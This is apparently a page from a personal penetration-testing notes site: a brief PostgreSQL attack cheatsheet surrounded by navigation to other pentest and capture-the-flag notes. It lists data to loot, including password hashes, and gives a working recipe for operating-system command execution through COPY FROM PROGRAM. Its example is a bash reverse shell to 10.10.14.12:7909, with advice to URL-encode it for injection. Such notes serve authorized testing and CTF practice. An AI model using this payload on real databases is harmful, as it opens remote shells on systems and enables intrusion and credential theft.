Notes
  • 👀About me
  • ℹī¸Good Reads
  • 🌐Web
    • Web Pentesting Checklist
    • Insecure Deserialization
    • Blind XPath Injection
    • GraphQL
    • Reverse Shells
      • IIS
    • Content-Security-Policy
      • XSS (Static Nonce in CSP)
    • LLM (Large Language Models)
  • 📘Windows API
    • C# - P/Invoke
  • ☕Miscellaneous Topics
    • Phishing with Gophish
    • Pentest Diaries
      • SQL Queries via Grafana
      • LDAP Pass Back Attack
      • Misconfigured File Upload to RCE
  • 🧃Hack The Box
    • Intelligence
    • Seal
    • Under Construction
    • Previse
    • Return
    • Sauna
    • Nest
  • 📕TryHackMe
    • Wordpress CVE-2021-29447
    • Attacktiv
    • Fortress
    • internal
  • 🛠ī¸Cheatsheet
    • Anti-Forensic Techniques
    • JSON - jq
    • Docker
    • Hidden Secrets
    • Database Exploitation
      • PostgreSQL
        • Blind SQLi script
      • SQL Server
    • C Sharp
    • Reversing
      • Windows
    • SSH
    • Python
      • Miscellaneous Scripts
        • Credential Bruteforcing a CLI service
    • Privilege Escalation
      • Windows
    • socat
    • OSINT
      • Shodan
    • Installation
Powered by GitBook
On this page
  • Compromising DB - [sqlmap code]:
  • Properties:
  • OS Shell [ v9.3–v14 ]:

Was this helpful?

  1. Cheatsheet
  2. Database Exploitation

PostgreSQL

PreviousDatabase ExploitationNextBlind SQLi script

Last updated 2 years ago

Was this helpful?

Compromising DB - [sqlmap code]:

Properties:

  • Nested Queries= query1;query2;...

  • Interact with DB via cmd line: psql quit: \q

  • Loot: 1. DBMS Version 2. Database Content 3. DBMS Users Password Hashes 4. OS Shell

OS Shell [ v9.3–v14 ]:

1. DROP TABLE IF EXISTS cmd_exec; 2. CREATE TABLE cmd_exec(cmd_output text); 3. COPY cmd_exec FROM PROGRAM '<cmd>' For eg. COPY cmd_exec FROM PROGRAM 'bash -c "/bin/bash -l > /dev/tcp/10.10.14.12/7909 0<&1 2>&1"' Note: single quotes needed for command. URL encode the whole POST/GET data.

🛠ī¸
https://github.com/sqlmapproject/sqlmap/blob/582bb2fec960db825478a54c0aabbd7ba551f1b8/plugins/dbms/postgresql/takeover.py